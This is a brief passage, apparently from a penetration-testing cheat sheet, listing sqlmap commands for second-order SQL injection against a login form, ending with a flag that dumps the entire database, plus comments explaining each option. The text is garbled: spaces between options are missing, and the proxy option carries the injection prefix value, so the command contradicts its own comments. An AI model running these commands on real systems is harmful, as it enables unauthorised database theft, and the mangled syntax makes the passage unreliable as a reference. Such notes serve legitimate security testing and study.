#Get the SQL payload execution with a GET to a urlsqlmap-rlogin.txt-pusername--second-url""#Get the SQL payload execution sending a custom request from a filesqlmap-rlogin.txt-pusername--second-reqdetails.txt
sqlmap--tampertamper.py-rlogin.txt-pemail--second-reqsecond.txt--proxyhttp://"a2344r3F'"--technique=U--dbmsmysql--union-char"DTEC"-a########### --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload# -r login.txt : Indicates the request to send the SQLi payload# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt# --second-req second.txt : Request to send to execute the SQLi and get the ouput# --proxy : Use this proxy# --technique=U : Help sqlmap indicating the technique to use# --dbms mysql : Help sqlmap indicating the dbms# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln# -a : Dump all